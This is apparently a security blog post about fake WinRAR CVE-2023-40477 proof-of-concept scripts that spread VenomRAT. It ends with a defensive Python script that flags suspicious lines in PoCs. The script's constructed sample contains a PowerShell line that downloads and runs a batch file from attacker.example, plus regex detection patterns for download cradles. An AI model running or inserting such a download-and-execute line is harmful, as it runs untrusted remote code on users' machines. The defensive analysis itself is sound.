# Fake WinRAR 0-Day

## CVE-2023-40477?

It seems that there are more threat actors that are utilising fake scripts to try and spread malware.

{% embed url="https://unit42.paloaltonetworks.com/fake-cve-2023-40477-poc-hides-venomrat/" %}

In the above report, it states that a user `whalersplonk` has released a fake PoC script for the RCE vulnerability in WinRAR known as CVE-2023-40477. The report was released on September 19, which means that the attacker must've been around for a while before people started noticing.

This is very similar to the other scenario I've covered where attackers create fake researcher profiles and release 'Discord 0-Days', which are basically `poc.py` scripts that execute some binary to give the threat actors SSH access.

In this instance, the fake Python script installs a VenomRAT payload onto the user's device. The report above is really comprehensive and provides a good summary of the tactics used by this threat actor, including:

* Social Engineering
  * Fake `README.md` files that explain the exploit.
  * Fake videos created on `streamable.com` (what an odd choice) of the actual exploit working
* Editing of scripts
  * The script is obviously different from the actual script, and malicious code that downloads and executes a batch script has been appended.
  * The script has also been modified so that the legitimate exploit code does not run fully, but the malicious parts do.
  * Uses this link to run a PowerShell download command and invoke the batch script:
    * `http://checkblacklistwords[.]eu/check-u/robot?963421355?Ihead=true`
* C2 Server
  * The VenomRAT virus communicates with the above link, suggesting that it is the location of the C2 server.
  * Keystrokes are also logged.

## Check Your Code...

I find it rather interesting that such methods are being used, where malware is being distributed on GitHub. This is the second time I've personally seen such a case, but unfortunately I wasn't fast enough to grab the script to analyse how it works for this one D:

Anyways, **please check your code before running it**. If you're going to run exploits, always read them first instead of blindly running them. You can also grab scripts from more reputable GitHub repositories, because it's quite likely that a 0-day exploit isn't going to come from a profile created 1 week ago.

If you're not going to try to read scripts to understand exploits, at least make sure you don't get wrecked.
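As an added example (this is not from the Unit 42 report or the original post), here is a small Python triage script for the "read it first" step above: it flags the kind of appended download-and-execute line and the unreachable exploit body described in the report, and lists every URL the script would contact. The sample PoC and the `attacker.example` URL are constructed for the demo.

```python
import re
from typing import Dict, List

# Heuristics for the tactic described above: a PoC whose real body has been cut short
# and that has a download-and-execute stage appended. A hit is a reason to read that
# line before running anything, not proof of malice (real exploits use subprocess too).
PATTERNS: Dict[str, re.Pattern] = {
    "shell_exec": re.compile(r"\b(os\.system|os\.popen|subprocess\.(run|Popen|call|check_call|check_output))\s*\("),
    "powershell": re.compile(r"powershell(\.exe)?\b|-EncodedCommand|Invoke-Expression|\bIEX\b", re.I),
    "download": re.compile(r"\b(urlopen|urlretrieve|requests\.get|DownloadString|DownloadFile|Invoke-WebRequest|curl|wget)\b", re.I),
    "batch_file": re.compile(r"\.(bat|cmd)\b", re.I),
    "obfuscation": re.compile(r"\b(b64decode|exec|eval|compile)\s*\("),
    "early_exit": re.compile(r"\b(sys\.exit|exit|quit)\s*\("),  # is the code after it reachable?
    "url": re.compile(r"""https?://[^\s'"<>)]+"""),
}

def triage_script(source: str) -> List[dict]:
    """One finding per (line, pattern) hit: line number, pattern name, line text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append({"line": lineno, "pattern": name, "text": line.strip()})
    return findings

def external_urls(source: str) -> List[str]:
    """Every URL the script would reach out to; compare these against the README's claims."""
    return sorted(set(PATTERNS["url"].findall(source)))

# Constructed sample "PoC": the exploit body is unreachable (exit before the write),
# and a PowerShell download-and-run line is appended at the bottom.
SAMPLE_POC = r'''import sys, struct

def build_rar(out_path):
    header = struct.pack("<I", 0x21726152)  # "Rar!" magic, little-endian
    return header + b"A" * 200

if __name__ == "__main__":
    print("usage: poc.py <out.rar>")
    sys.exit(0)
    open(sys.argv[1], "wb").write(build_rar(sys.argv[1]))

import os
os.system("powershell -c \"(New-Object Net.WebClient).DownloadFile('http://attacker.example/robot', 'u.bat'); Start-Process u.bat\"")
'''

if __name__ == "__main__":
    for f in triage_script(SAMPLE_POC):
        print(f"line {f['line']:>3} [{f['pattern']}] {f['text']}")
    print("URLs contacted:", external_urls(SAMPLE_POC))
```

Run it against any `poc.py` before executing it; a URL that is not mentioned in the README, or exploit code sitting after an unconditional exit, is exactly the pattern the report describes.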
